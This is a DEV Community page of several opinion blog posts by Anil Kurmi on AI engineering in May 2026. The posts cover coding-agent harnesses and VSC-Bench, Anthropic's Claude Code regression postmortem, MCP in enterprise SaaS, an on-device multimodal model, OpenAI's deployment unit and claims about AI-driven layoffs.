DEV Community: Anil Kurmi

The Agent Harness Is the Real Product. The Model Is Just the Engine.

Anil Kurmi — Sat, 16 May 2026 10:20:34 +0000

On May 15, the VS Code team published a blog post that quietly reframed the last two years of "best coding model" arguments. Buried inside it is a scatter plot from their internal benchmark, VSC-Bench, that I have been thinking about all week.

The chart compares eight model-effort configurations across forty containerized runs. The line you expect goes up and to the right: more reasoning effort, more tokens, more tasks resolved. It mostly does. Until you get to xhigh. At xhigh, the model burns more tokens than high and resolves fewer tasks. The caption is dry as gravel: "may indicate that it is past the useful effort sweet spot where extra thinking no longer converts into better outcomes."

Read that twice. The biggest, hungriest, most expensive setting is worse. Not slower. Worse. And the only reason anyone knows is because someone built a harness that could measure it.

That is the story of the week. The model is the engine. The harness is the car. And this week, three different teams shipped pieces of the car.

The 5-Minute Skim

What changed this week: VS Code documented its Copilot agent harness in detail, shipped Agents Window to Stable in 1.120, Visual Studio added Agent Skills, and Martin Fowler published a framework that tells you why none of this is enough.
Default recommendation: Stop chasing model upgrades in isolation. Tune the harness — context assembly, tool exposure, system prompts — per model, and measure with a closed-loop eval. Treat skills (SKILL.md files) as a first-class context-budget tool.
When it breaks: The "behaviour harness" is still unsolved. Your linters and ArchUnit will catch dead code and layering violations. Nothing catches the AI writing a 300-line function that works but that no senior on your team would ever ship.
Key trade-off: More reasoning effort is not free, and beyond a point it actively hurts. Spend the budget on harness engineering instead.

Visual Architecture: The Harness Is the Loop

The model is one node. The harness is the cycle wrapped around it, plus the eval loop that grades the cycle.

Why does this conversation matter now?

For most of 2024 and 2025, the discourse on coding agents was a model-leaderboard arms race. Sonnet vs. GPT vs. Gemini. SWE-bench scores. Twitter threads with column charts.

Then May 15 happened. The VS Code engineering team published "Agent Harnesses in GitHub Copilot for VS Code" and Julia Kasper wrote one of the cleanest framings I have read all year: "The model gets better at filling in the blanks, but the harness defines what the blanks are."

Two days earlier, VS Code 1.120 pushed the Agents Window to Stable and shipped two settings that look small until you read them: chat.tools.compressOutput.enabled, which trims terminal output before it hits the model, and chat.tools.riskAssessment.enabled, which tags commands as Safe / Caution / Review carefully. Neither is a model improvement. Both change what the agent does. Same day, Visual Studio's DevBlog announced Agent Skills, built on the agentskills.io spec. And Martin Fowler published "Harness engineering for coding agent users," which gives the whole movement a vocabulary.

Four pieces, one week. The harness has graduated from implementation detail to product surface.

What is actually inside a harness?

Strip away the marketing and you have three responsibilities and one loop.

The context assembler decides what goes into the prompt. Not just the user message — the open file, recent edits, terminal output, prior tool results, pinned memory, the relevant chunks of AGENTS.md. This is the layer that gets blamed when the model "forgets" what you told it three turns ago. It rarely deserves the blame. Context windows are finite, and someone had to choose what to drop.

The tool exposure layer turns the things the agent can do into JSON schemas the model can call. This is where the per-model divergence lives, and it is more brutal than I expected. Claude models in Copilot use a tool called replace_string_in_file. GPT models use apply_patch. Gemini, in Kasper's words, "needs reminders to use tool-calling instead of narrating it, and breaks on orphaned tool calls in history."

Read that again. Gemini will sometimes describe what it is about to do instead of doing it. The harness has to detect this and nudge it back. If a previous tool call is left dangling because of a network hiccup, Gemini's run dies. It is what the model is. The harness has to know.

The tool executor validates arguments, spawns processes, captures output, and decides what to send back to the model. This is where output compression lives. A 12,000-line npm install log is context poison. The 1.120 setting collapses it to a banner like "lockfile diff omitted" plus the final summary, and the model proceeds without choking on yarn progress bars.

Wrapped around all three is the agent loop: think, act, observe, repeat. VS Code calls a single LLM invocation a round, a user-facing exchange a turn, and the whole conversation a run. Tool-call limits per round. Context-window summarizer. Stop hooks. None of it is the model.

Claude Sonnet 4, Sonnet 4.5, and Opus each get their own system prompt. The team tunes the harness against pre-release model checkpoints before the model goes public. By the time you see "Claude X.Y is now available in Copilot," somebody has spent days re-shaping the scaffolding around it.

Why is per-model tuning real engineering, not a config flag?

This is the part most teams underestimate.

The temptation is to write one harness that takes a model_id and routes the call. One context assembler. One tool registry. One prompt template with a couple of conditional blocks. It is the right starting point. It is also the wrong place to stop.

The VS Code team makes the opposite call. Different system prompts per model family. Different tool sets — not just different names for the same tool, but actually different tools because apply_patch and replace_string_in_file have different failure modes. Different reminders for Gemini. Different trim policies because some models cope better with long tool history than others.

Why does this matter for the rest of us? The moment you ship a model picker, you have inherited this problem. A user clicks the dropdown from Sonnet to GPT, and your harness either gracefully retunes itself or it produces worse output than the model is capable of. Switching models without retuning the harness can decrease quality. That is the unintuitive bit.

Model-agnostic frameworks are useful for the first 80% of the work. The last 20% — the part your users feel — lives in the per-model glue.

VSC-Bench: when more thinking hurts

Back to the chart that started this post.

The line goes up, then bends down at xhigh. More reasoning tokens, fewer tasks resolved. The dry-as-gravel caption: "past the useful effort sweet spot."

VSC-Bench runs forty tasks across eight model-effort configurations inside containerized workspaces. Each container launches a real VS Code, drives the full agent loop, and grades the result. It is offline, deterministic enough to compare runs, and free of the SWE-bench contamination problem where models may have been trained on the very issues being tested.

What it shows is that effort is a curve, not a ramp. Medium to high reasoning effort buys more resolved tasks. High to xhigh costs more tokens and gives back fewer. There is a measurable ceiling. Past it, the model's "extra thinking" looks like a drunk person re-litigating the same argument with themselves.

It is rare to see a vendor publish a chart that says "our most expensive setting is worse." Most release notes would have quietly removed xhigh from the documentation. Without VSC-Bench, you would just be guessing.

If you have not built an evaluation that drives the entire loop end-to-end on a fixed task set, you do not actually know whether your agent is getting better. You know whether your latest commit feels good in a demo.

The PR-level eval pipeline

The plumbing behind VSC-Bench is, in some ways, more interesting than the benchmark itself.

Six steps, fully automated. A regression in the harness is caught before merge, not after a Twitter thread surfaces it.

A pull request to the Copilot extension is tagged ~requires-eval-assessment. That label triggers an Azure DevOps build, which packages the eval agent for that PR, versions it, and publishes it to an internal vscode-evals npm feed. A repository_dispatch event fires off to a separate repo, github/evald, which pulls the freshly published eval agent and runs the benchmark. Intermediate status comments are queued back to the PR via an Azure Logic App. Final results show up as comment links — not an inline analysis body, because dumping full traces into a PR conversation would make it unreadable.

A closed loop. Code change → packaged eval agent → containerized run → comment with links → human reviews. The per-PR gate means a regression in the harness is caught before it ships, not after a Twitter thread surfaces it.

Most teams I talk to do not have this. They have unit tests for JSON schemas and a manual demo before the release. The gap between that and what VS Code is doing is the gap between "we shipped an LLM feature" and "we are running an agent platform."

Skills as a harness extension primitive

While VS Code documented the harness, Visual Studio shipped Agent Skills, built on the agentskills.io specification. Same week, same conceptual move: turn extensible behavior into something the harness can reason about.

A skill is a directory containing a SKILL.md file plus optional supporting artifacts. The spec defines a clean progressive disclosure model. Roughly 100 tokens of metadata get loaded at startup so the model knows the skill exists. The full body — capped at 5,000 tokens — only loads when the model decides the skill is relevant. Referenced files load on demand.

Three loading tiers. Three context-budget moves. Good harness design when nobody is allowed to be lazy with the context window.

Skills also carry an allowed-tools field for skill-scoped tool gating. A "release notes" skill might be allowed to run git log and write Markdown, but not kubectl. A security primitive that lives in the harness, not the model.

Custom instructions are always on — your team's coding style, the framework you use. Skills are dynamically activated per task. Conflating them is what makes prompts bloated and agents confused.

Skills and MCP also fit together cleanly. The skill describes how to handle a task. MCP provides the capability to execute. The skill tells the model when and why to reach for the MCP tool — a handoff doing more work than it gets credit for.

The unsolved problem: behaviour

So the harness is winning. Right? Not quite.

Martin Fowler's article this week introduces a vocabulary I have already started borrowing in design reviews. He splits harness controls into guides (anticipatory: AGENTS.md, skills, scaffolding scripts) and sensors (observational: linters, type-checkers, AI review agents). And he splits both into computational — deterministic, fast, cheap — and inferential — semantic, slow, expensive.

He then groups what we are trying to regulate into three buckets: maintainability, architecture fitness, and behaviour. The first two are largely solved. Linters, formatters, ArchUnit, fitness functions — twenty years of accumulated tooling that translates cleanly into harness sensors.

Fowler's framework. Two of three buckets have twenty years of tooling. The third — does the code do the right thing for the user? — still needs a senior engineer in the loop.

Behaviour is the problem. Does the code do the right thing for the user? Fowler's honest answer is that we are nowhere close. Generated tests "put too much faith into AI-generated tests, that's not good enough yet."

The deeper problem is the one he names with rare bluntness: "A coding agent has none of this: no social accountability, no aesthetic disgust at a 300-line function, no intuition that 'we don't do it that way.'"

Sit with that. The implicit harness on a senior engineer is decades of taste, the discomfort of writing something you would be embarrassed to show in a review, the awareness that your name is on the commit. None of it is in SKILL.md. None of it shows up in a linter. The xhigh effort setting will not produce it either — the VSC-Bench chart suggests the opposite, that more thinking past a point produces worse judgment.

The behaviour harness is the open frontier. Every team I see succeeding with coding agents has a human in the loop doing the aesthetic-disgust work. The harness has not replaced that human. It has made the human's leverage 5–10x what it was.

What you should do next

A few things that fall out of the week's reading:

Stop debating model X vs. model Y in isolation. Pick the model your harness is best tuned for. If you cannot tune the harness, pick the harness, and the model will follow.
Measure the loop, not the response. If you ship anything agentic, you need a VSC-Bench equivalent. Containerized runs, fixed task set, end-to-end agent loop, gated by your PR pipeline. Even a tiny version beats nothing.
Treat context-budget as a first-class concern. Compression, summarization, progressive disclosure via skills. The 5,000-token cap on a SKILL.md body is not arbitrary — it is the spec saying "respect the budget."
Adopt the per-model tuning mindset. Even if you route to a single provider today, write your harness so per-model system prompts and tool sets are easy to swap in.
Be honest about the behaviour gap. Your agent will write code that looks fine and is subtly wrong in ways your linters cannot catch. Build review rituals that assume it.

The quietly radical line in the VS Code post is the one that does not announce itself. Different models get different system prompts, different tools, different reminders. Somebody, every week, is rewriting little pieces of the wrapper while the model APIs sit still.

That is where the work is now. The engine is somebody else's problem. The car is yours.

Claude Code didn't get worse. The harness did. And that ends one of the most common AI complaints of 2026.

Anil Kurmi — Sat, 16 May 2026 09:52:39 +0000

For two months, the same complaint kept showing up on every developer forum I read: Claude Code feels worse. Sometimes worded politely, sometimes not. The vibe was unanimous enough that I almost started believing it on reputation alone.

Then on April 23, Anthropic published a postmortem that I think ends this whole class of complaint as a useful conversation. Read it. Even if you don't ship anything with Claude. Especially then.

Here's the position I'll defend: "the model got worse" is no longer a credible developer complaint without evidence. The Anthropic postmortem is proof that the user experience of an LLM product can degrade severely without anyone touching the weights. From now on, the responsible reply to "Claude feels worse this week" is show me the harness diff, not the model card.

What actually broke

The thing that should make every AI product engineer sit up: none of the three regressions were model weights. They were all in the layer most teams treat as boring infrastructure.

Regression 1 — reasoning depth got quietly downgraded. On March 4, Anthropic moved the default reasoning effort from high to medium to cut latency. Users reported lower intelligence. The complaints were real. The model was the same. The default wasn't. They reverted on April 7.

Regression 2 — a caching bug ate prior reasoning. On March 26, an intended one-time clearing of old thinking in stale sessions was applied repeatedly. So context kept getting amputated mid-conversation. The model felt forgetful because it actually was forgetting. Fixed April 10.

Regression 3 — a brevity instruction tanked coding output. On April 16, a strict length nudge in the system prompt went out. It looked harmless. It wasn't. Anthropic's own expanded evals showed measurable coding quality drops. Reverted April 20.

The whole stack was clean again by April 20 in v2.1.116. InfoQ's writeup is a useful secondary read, but the original is better because it gives you the timelines.

Why this is the most important engineering document of 2026 (so far)

I don't say that lightly. Three reasons.

One: it kills the lazy mental model. Most teams I talk to debug AI features the way they debug a database query — assume one thing changed, find that one thing. Anthropic's incident shows the product layer is now a distributed system with its own failure modes: defaults, caches, prompts, all moving independently, on different timelines, affecting different traffic slices. You can't reason about it like a single component anymore.

Two: it sets a transparency precedent that other labs now have to match. Once one major lab publishes timelines, root causes, eval deltas, and reversion dates for a quality regression, the others can't keep claiming "we don't comment on user feedback." The bar moved.

Three: it implies that most teams shipping LLM products lack the reliability tests they need. If three independent changes can pass review and ship without anyone catching the cumulative quality cost, that's not an Anthropic problem. That's a we as an industry haven't figured out evals for harness changes yet problem. I would bet most teams reading this have a CI that runs unit tests on prompts approximately never.

The thing I want every AI product team to internalize

Your model isn't your system. Your harness is your system.

The harness is:

which model variant you call by default
which reasoning depth you allow by default
what survives a cache hit and what doesn't
what the system prompt nudges
which tools are allowed in which contexts
what the timeout / retry / fallback shape is

If you don't have an eval that runs when any of those change, you are flying blind. The model is the input. The harness is the product. Treat changes to the harness like you treat code changes — with reviews, rollout gates, eval deltas, and a rollback playbook.

I think this is going to become the new bar for what "shipped responsibly" means in AI products. The teams that take it seriously this year will be the ones that look stable in 2027. The teams that don't will spend 2027 explaining quality regressions to angry users without any real diagnostic ability.

What I want pushback on

I want to be honest about where I might be overclaiming.

The skeptical read is: "Sure, this incident was harness-side. That doesn't mean all user complaints are harness-side. Some models really do degrade over time — distillation cycles, RLHF drift, evaluation Goodharting." That's fair. I'm not claiming model weights are sacred. I'm claiming the burden of proof flipped.

When someone says "the model got worse," the productive next question is: can you share a prompt + output that was good last month and bad this month, with timestamps? If they can, you have evidence. If they can't, you're working from vibes and the harness is the more likely culprit.

Where I want disagreement: if you think the harness-vs-weights distinction is too clean — that they're entangled in ways that make the framing misleading — I want to read your argument. I'm leaning hard on the separation. Convince me it's fragile.

What this changes for engineers shipping LLM features

Concrete actions worth doing this quarter, in priority order:

Inventory your harness surface. Write down every knob: default model, default reasoning depth, system prompt, cache TTL, retry policy, tool-allow lists. You should be able to hand a new engineer one page that tells them what your product actually sends to the model.
Build a harness eval that runs on every change to any of those knobs. Doesn't have to be fancy. 50 representative prompts with golden outputs is enough to start. The point is catching regressions before users do.
Treat prompt edits as production changes. Reviews, rollout gates, the works. Yes, even the "just one more sentence" edits.
Log enough trace data to reproduce a complaint. Session ID, prompt version, model variant, reasoning depth, cache state. When a user says "this got worse," you should be able to pull up the actual call.
Write your own postmortems publicly. Anthropic raised the bar. The teams that meet it will earn trust that the silent ones can't.

If your team has shipped a quality regression in an LLM product and survived it, I'd love to know what you learned — especially the first thing that broke. My guess is it almost always wasn't the model.

MCP just walked into enterprise SaaS like it belonged there, and most people missed it

Anil Kurmi — Sat, 16 May 2026 09:52:15 +0000

The quietest big AI shift of 2026 happened this week, and almost nobody noticed.

On May 14, Freshworks shipped Freddy AI Agent Studio and an MCP Gateway inside Freshservice. It sounds like another "we added AI" product update. It isn't. The MCP Gateway is doing the load-bearing work, and an ITSM vendor — an ITSM vendor — is the one productizing it for mainstream IT operations.

Here's the position I'll defend: MCP has already won. Most people just haven't noticed yet. In two years we're going to talk about MCP the way we talk about LSP for editors — the layer everyone forgot was a fight, because one side simply won.

Why this launch is the bigger signal

For a year, MCP discourse lived in developer Twitter and framework communities. Cool protocol, neat demos, occasional skepticism about whether the abstraction would survive contact with enterprise reality.

Then Freshworks dropped it into IT service workflows — pulling context from Notion, Linear, ClickUp into Freshservice — and packaged it with governance language and outcome metrics (xLAs + AI Insights, in their framing). No press circuit. No "this is the future" keynote. Just shipped.

This is the threshold that matters for any standard: it goes from "developer-conference favorite" to "load-bearing piece of a paid SaaS product an enterprise IT director already pays for." LSP did this. Kubernetes did this. SAML did this. Most standards that don't do it die in the developer-tools layer and never become infrastructure.

MCP is doing it. Right now. Without anyone declaring victory.

What's actually under the hood

Freshworks bundled three things:

Agent Studio — no-code and prebuilt agents for service workflows. Fine. Necessary. Not the interesting part.
MCP Gateway — the context bridge to third-party tools without bespoke per-integration code. This is the interesting part.
xLAs + AI Insights — outcome metrics tying agent performance back to experience signals so teams can prove or disprove the agent's value.

Stack them and you get: build the agent fast, wire it into real context fast, then measure whether it actually helped fast. That's the loop most enterprise AI projects can't close. Pilots stall at the "wire it into real context" step. MCP at the gateway layer makes that step shorter.

The opinion I keep arguing with people about

I get this counter a lot when I say MCP has won: "Protocols don't matter until enterprises actually adopt them. Talk to me when Salesforce ships MCP, not Freshworks."

I disagree with this and I want to lay out why.

Standards don't win because the biggest player blesses them. Standards win because the cost of using the standard becomes lower than the cost of building your own glue, and that crosses a threshold for an integrator somewhere in the middle of the stack. The middle of the stack is where it always starts. LSP didn't win because Microsoft anointed it; it won because individual editor maintainers couldn't justify writing N×M integrations anymore. Same shape here. Freshservice doesn't need to be the biggest enterprise SaaS for the math to flip. It just needs to be a credible proof that the gateway pattern works at production scale for someone real.

Once the gateway pattern is normalized, every adjacent product manager looks at their backlog of "integrate with X tool" tickets and thinks, "We could write 20 connectors, or we could put an MCP gateway in front and ship 100." The math is not subtle.

If you're building agent infrastructure today and you haven't picked your MCP posture — server, client, gateway — you have already lost a year of compounding integrations. I'll defend that strongly. Tell me why I'm wrong.

Where the optimism gets uncomfortable

I want to be honest about the part of this that bothers me, because the "MCP solves enterprise AI" framing has obvious failure modes.

The abstraction can hide data lineage. "No custom code" feels great until something leaks across a permission boundary and the trail of how the model got that data is buried three protocol hops deep. Governance has to keep up with adoption speed, and right now it isn't.

Semantic alignment is harder than connectivity. The protocol problem (how do tools talk?) is mostly solved. The ontology problem (what does "high priority ticket" mean across four systems?) is not. I think the next integration war is going to be semantic, not API-level. I don't have a confident answer for how it gets won.

No-code doesn't remove engineering. It moves it. It moves it into identity, audit, policy, rollback, and incident response. Which is more engineering, not less, just in places most "no-code" pitches avoid talking about.

Where they all agree: the integration layer now decides enterprise agent success more than the model layer does. That's not in dispute. The question is whether protocol standardization makes the integration layer easier or just trades one class of pain for another.

What this changes if you're a developer

A few uncomfortable shifts that are happening whether you're ready or not:

Integration skill is core AI skill now. Data contracts, permission models, workflow boundaries, audit trails. If you optimize your career around prompt tuning in 2026, you're optimizing for the wrong layer.
Protocol literacy is no longer niche. Understanding MCP's actual semantics — what a tool description means, how schema negotiation works, where authentication sits — is production knowledge in 2026, the way HTTP semantics were in 2008.
Observability is mandatory before scale. If you can't trace which tool fed which context into which decision, you cannot safely scale a Freshservice-shaped agent in production. Most teams don't have this yet.
Governance work pays more than it used to. The people who can write a defensible audit trail for an agent's actions are about to become very expensive.

The honest counter-position

I should acknowledge the strongest counter to my "MCP has already won" claim. It goes: standards have died at this stage before. Adoption inside one vendor doesn't mean ecosystem lock-in is broken. Maybe MCP fragments — vendor-specific extensions, incompatible gateways, the usual.

That could happen. The history of standards has plenty of "won the demo, lost the war" stories. I just don't think it's the most likely path here, because the gateway pattern (one component absorbing all third-party connections) is exactly the architectural shape that makes standard divergence painful. The economic incentive to stay compatible is stronger than the political incentive to fork.

But I could be wrong. If you think MCP fragments by 2027 — into "Anthropic-MCP" vs "OpenAI-MCP" or a Salesforce-flavored fork — I'd like to hear the argument.

if you've shipped a real agent integration this year, did MCP make it easier, or did it just add a layer? I'm taking the "easier" side. Show me the case where it was the wrong call.

A 1.3B model just shipped that runs on your phone, and the labs obsessed with frontier scores won't see this story coming

Anil Kurmi — Sat, 16 May 2026 09:51:47 +0000

This week was quiet for frontier model launches. No new flagship. No leaderboard reshuffle. The trackers basically reported "nothing happened up top." That should tell you something — because the actual model release that mattered this week didn't come from any of the names you'd expect.

On May 11, OpenBMB open-sourced MiniCPM-V 4.6: a 1.3B-parameter multimodal model, image and video, with explicit deployment targets across iOS, Android, and HarmonyOS. Open weights on Hugging Face. No marketing tour. Just a release that, if you squint, is one of the most strategically interesting things to happen in open AI this year.

Here's the position I'll defend: the next big AI consumer story will be local-first multimodal, and the labs that obsess about frontier scores are going to miss it. The shift won't be announced. It won't have a keynote. It will just show up in the apps you actually use one day, and you'll wonder when that happened.

Why a 1.3B model is the bigger story

I want to be specific about what makes this release matter, because "small model improves" is the most common AI headline of the last three years and most of them are noise.

The thing that's different here is the design intent. MiniCPM-V 4.6 is not trying to beat anyone on benchmark tables. The release materials and model card lean heavily on throughput, visual token compression (mixed 4x/16x), and framework compatibility across the open-source serving stack — vLLM, SGLang, llama.cpp, Ollama. That isn't the language of a model team chasing prestige. That's the language of a model team optimizing for getting deployed.

Three years ago, "1.3B multimodal model that actually fits on a phone" would have read as a research curiosity. Now it reads as a serious product line. The hardware curve and the model-design curve crossed sometime in the last 18 months, and we're in the early innings of what happens after.

The shift nobody's narrating loudly enough

I'll commit to a stronger claim. The dominant story in AI for the last three years has been bigger is better at the top. The story for the next three is going to be good enough is good enough at the edge, and the value capture is going to move accordingly.

Here's why:

Most users don't need the frontier. They need fast, private, reliable, cheap. A 1.3B model that runs on the device and answers "what is in this picture" with 85% accuracy in 200ms beats a frontier model that does it with 97% accuracy in 2 seconds plus a network round-trip plus a per-call cost. For most consumer workloads, the second one is worse product.

The economics flip when you don't pay per call. Every consumer AI app today has a per-inference cost that quietly murders product margins at scale. Local inference removes that line item. Once one major consumer app proves the pattern — chat, photos, accessibility, transcription — every adjacent app's CFO will start asking why they're still paying inference bills.

Privacy is going to do real work as a wedge. Not because users wake up demanding it, but because regulators will, and because the marketing teams will figure out it's a differentiator. "Your photos never leave your device" is going to sell. Local multimodal is the only way to deliver it without a footnote.

I'm not saying frontier models become irrelevant. I'm saying the consumer surface of AI shifts to local-first, and the frontier becomes back-of-house — used for hard problems, training data generation, and the long tail of escalations.

The skeptical case I keep arguing with

The honest counter to my read: small models still hallucinate, still fail on edge cases, still need cloud fallback. Local-first is a story you can tell on Twitter but not one you can ship to 100 million users.

I'll concede part of this. Small multimodal models do underperform on adversarial inputs and complex visual reasoning. That's real. But the framing assumes a binary — local OR cloud — and the actual production architecture is a tier. Small local model handles 80% of requests. Frontier cloud model handles the hard 20%. That's already shipping in early form. It will get more common, not less.

The thing I keep telling people building consumer AI: if you're routing every request to a frontier model, you're spending money on capability your users mostly don't need, and you're going to lose to a competitor who tiers their stack.

The architectural pattern I think wins

If I'm right about this, the next-decade architecture for consumer AI looks like:

Mini multimodal model on-device for high-volume triage — recognize, transcribe, route, classify. Fast, free, private.
Frontier model in the cloud for low-volume escalation — hard reasoning, complex generation, anything the local model flags as low-confidence.
Eval-driven routing between them — the system learns where the mini model is reliable and where it isn't, per workflow.

This is not exotic. It's how mature systems already work in adjacent domains (caching tiers, search re-ranking, fraud detection). AI is going to converge on it because the math works.

The labs that are still pitching "use our flagship for everything" are pitching against this. They will be right about technical capability and wrong about product economics. That's a lonely place to be.

What this means if you're a developer or PM

Concrete moves, in priority order:

Test a mini multimodal model on your actual workload. Not the benchmark. Your data, your latency budget, your error tolerance. MiniCPM-V 4.6 is a reasonable starting point and the weights are free.
Map your current AI calls by "is this hard or routine?" I'd bet 60–80% of your cloud spend goes to routine calls that don't need the frontier. That's a refactor waiting to happen.
Build evals for your domain, not generic charts. A model that wins on MMMU might lose badly on your specific image distribution. The only eval that matters is yours.
If your product touches mobile or embedded, start the local-first prototype now. The window where you can architect for tiered inference and beat slower competitors closes faster than you'd think.

Where I want pushback

The argument I'd most like to lose: consumer AI stays cloud-centric because the model improvements at the frontier compound faster than the deployment improvements at the edge. If that's right, then "good enough local" is a moving target that never catches up.

I don't think that's how it'll play out, because most consumer use cases are not bottlenecked by capability anymore — they're bottlenecked by latency, cost, and privacy. But it's the strongest version of the counter, and I'd genuinely like to hear it argued well.

If you've shipped a consumer product where local inference made or broke the user experience, I want to hear the story — wins and disasters both.

if you think the consumer AI surface stays cloud-first for the rest of the decade, I want to read the argument. I'm betting against it. Show me where my bet breaks.

OpenAI's Deployment Company is the biggest AI move of 2026, and most of the industry hasn't clocked it

Anil Kurmi — Sat, 16 May 2026 09:46:18 +0000

I'll start with the position I'm willing to defend: OpenAI's Deployment Company is the most strategically loaded AI move of 2026 so far, and the industry is mostly underreacting to it.

If you read the official launch announcement on May 11, it sounds like a partner program. 19 firms, Bain co-investing, a pending Tomoro acquisition that hands them about 150 forward-deployed engineers from day one. Polite, structured, partnership-flavored. Then you look at the actual structure and the story changes.

OpenAI is the majority owner. The unit sits next to model development, not in a corner partnership org. There's a real budget. Forward-deployed engineers — the Palantir model — are now the day-one staffing primitive. This is not a partner program. This is OpenAI deciding it wants the implementation margin too, not just the inference margin.

Why this isn't a "services play"

The lazy framing is: "Oh, OpenAI is adding services like a consultancy." That misreads what just happened.

Services adjacent to a product are a margin add. Services owned by the model lab are a strategic relocation of where decisions get made. Here's the logic:

If the lab owns deployment, it shapes architecture decisions earlier.
If it shapes architecture earlier, it sets the defaults — which model, which tooling, which orchestration shape.
If it sets defaults, competing providers don't just have to displace a model. They have to displace an operating workflow.

That's distribution power, not professional services. The fact that Bain co-invested and is framing this as a shared execution layer for their PE portfolio is the part that should make every other lab nervous. It means OpenAI is bringing a captive enterprise channel along with the engineering team.

The Tomoro detail is doing a lot of work

The press circuit mostly glossed over the Tomoro acquisition. Don't. The math is straightforward: building a forward-deployed delivery org from scratch takes 18–24 months. Buying one takes a quarter. Tomoro gives OpenAI immediate field capacity to do the diagnostic-to-production loop that CRN's coverage describes — identify a high-value workflow, embed engineers, redesign the process, harden it for production, then measure outcomes.

That loop is the actual product. The model is the input.

Where I think this lands in 18 months

I'll commit to a prediction. Within 18 months:

Anthropic will have its own equivalent. (They already gestured at one — TechCrunch flagged the parallel in early May.)
Google and Microsoft will quietly bolt the same shape onto their existing enterprise arms.
The independent "AI implementation" consultancy category will get squeezed from both ends — by lab-owned units above and by enterprise platform teams below.
The phrase "neutral platform" will start sounding like marketing copy, the way "open AI" did three years ago.

Tell me which of those four you think I'm wrong about. I'd genuinely like to hear the counter — especially from anyone running an AI services firm right now.

What it means if you're an engineer

If you're an engineer at a typical Fortune 500 looking at AI rollout, this changes the procurement story for you:

Model choice is going to be made earlier, by people who aren't engineers. "Which model" will be decided during workflow design, not after a vendor bake-off.
Implementation skills outrank prompt skills now. Engineers who can map model behavior to business process constraints — risk, approvals, auditability, data lineage — are more valuable than prompt specialists. Has been true for a year, will be obvious in six months.
Lock-in is going procedural, not technical. The day your team adopts a deployment template — the runbooks, the dashboards, the eval harness — the cost of replacing the underlying model goes from "swap an endpoint" to "redo our operating system."
The line between consulting and product is dissolving. You'll be doing more work with hybrid teams where the playbooks, the tooling, and the model policy come from the same vendor stack.

If you're at a smaller shop, you have a window: you can still pick architecture before the lab-owned playbooks get heavy enough to be the default. That window will not stay open.

The skeptical case I keep arguing with

I want to be honest about the strongest counter to my read.

The counter goes: "This is just OpenAI getting paid for the work it was already doing for free in design partner engagements. It's monetization, not strategy. It's not that interesting."

I don't fully buy it, but I'll concede the smaller version: enterprises will keep hiring multiple labs in parallel for the next two years, hedging across providers. So the lock-in story is slower than I'm suggesting. Fair.

What I don't concede: the long-run gravitational pull. Once one lab's deployment templates become the path of least resistance for the enterprise's next AI rollout, the others are renting that customer, not owning them.

if you think lab-owned services arms are net-bad for the ecosystem — for the SIs they squeeze, for customers who lose neutral advice, for engineers who used to live in the middle — I want to hear it. I lean toward "this is a normal phase of platform maturity and was always coming." Convince me otherwise.

The 'AI is replacing engineers' narrative is mostly bullshit, and I'm tired of pretending otherwise

Anil Kurmi — Sat, 16 May 2026 09:45:29 +0000

I'm going to make a claim that's going to upset some people, including some people I respect: most of the "AI-driven layoff" narrative in 2026 is bullshit, and we're letting CEOs use it as cover for a different story.

I want to be careful about what I am and am not saying. AI is real. It is changing work. It will continue to change work. None of that is in dispute. What I'm saying is narrower: the causal chain being sold in press releases — "AI made us productive, so we don't need these people" — is mostly not supported by the productivity data we actually have. And I think we owe each other more honesty about that.

Two pieces dropped this week that crystallized it for me.

The data and the story stopped matching

NBC ran a piece summarizing METR-reported findings: experienced developers were about 19% slower on real tasks when using AI tools, even when many of them believed they were faster. Same week, you could refresh LinkedIn and watch a parade of CEOs frame layoffs as AI-efficiency outcomes.

These can't both be straightforwardly true. Either AI is making developers faster — in which case the slowdown evidence needs an explanation — or it isn't, in which case the "we don't need these people because AI" framing is doing something other than describing reality.

The Conversation took the framing apart and arrived at roughly the read I've been carrying: most "AI layoffs" are post-ZIRP headcount correction plus investor signaling, with a thin layer of AI narrative laid on top because that narrative is socially and financially cheaper than admitting "we over-hired in 2021 and the cost of capital changed."

Why the AI narrative is the convenient one

Sit in a CEO's chair for a minute. You over-hired in 2020–2022 when money was free. Now money isn't free. You need to cut 10–20%. You have three explanations you can give the market:

"We made a strategic error." Stock punished. Board annoyed. Your tenure shortens.
"Margin pressure from competition is forcing this." Stock punished. Suggests weakness.
"AI is making us more efficient." Stock rewards. You look forward-looking. You're not cutting — you're transforming.

Option three is not a lie, exactly. But it's not a careful description of the causal chain either. It's a rationalization that happens to also be the most market-friendly explanation. If you wonder why it's the explanation we keep hearing, this is most of the reason.

Look — I don't think every executive saying this is being cynical. I think a lot of them have genuinely convinced themselves the chain is real. AI did enter the workflow. Layoffs did follow. The brain pattern-matches a story. That's how humans do narrative.

But the data is what the data is. And until I see a serious peer-reviewed study showing sustained, broad-based productivity gains in real engineering work — not vibes, not vendor white papers, not "developers said they felt 20% faster" surveys — I'm going to keep my hand on the bullshit detector.

What I think is actually happening

Here's the version I'd defend:

Compression, not replacement. The labor signal isn't extinction. It's compression. Fewer entry and mid roles. Sharper premium on engineers who can actually ship AI in production. A flattening of the career ladder where the rungs that mattered most for early-career growth are quietly being removed. That's painful and serious and worth talking about. It's also a different problem than "AI is doing my job."

Pre-existing trends getting AI-labeled. Customer support reductions have been creeping for a decade, driven by chatbots and self-service before LLMs. The "AI replaced our CS team" framing is half true and half a marketing relabel of a slow trend that finally hit a tipping point. The trend is real. The "this just happened because of AI in 2026" framing is not.

Productivity gains that exist but are uneven. I'll concede AI helps materially in some workflows — boilerplate code, routine documentation, repetitive triage. It hurts in others — complex debugging, novel system design, anything heavy on tacit context. The average is unimpressive. The variance is huge. The story-tellers conflate the helpful slices with the average and sell the average.

The talent that benefits is concentrating. Engineers who already had strong system context, judgment, and integration skill are getting a real multiplier. Engineers earlier in the curve are not. So the productivity story is more about which engineers than about whether engineering work overall is faster. That's a much less marketable framing for a press release.

What I want to be wrong about

Let me steelman the other side honestly, because I might be too cynical about this.

The strongest pro-narrative argument I can think of: maybe the productivity studies measure the wrong things. METR-style task experiments are bounded by design. They may miss the compounding gains — code reuse, faster onboarding, lower bug rates downstream — that show up in quarterly metrics but not task-level ones. A team that ships 19% slower on tested tasks but has 30% fewer regressions in production is not actually slower. It might be a lot faster.

That's plausible. I'd take the argument seriously if I saw the longitudinal data. So far, what I see is short-horizon studies showing mixed-to-negative results, plus executive narrative going strongly positive without the data to back it.

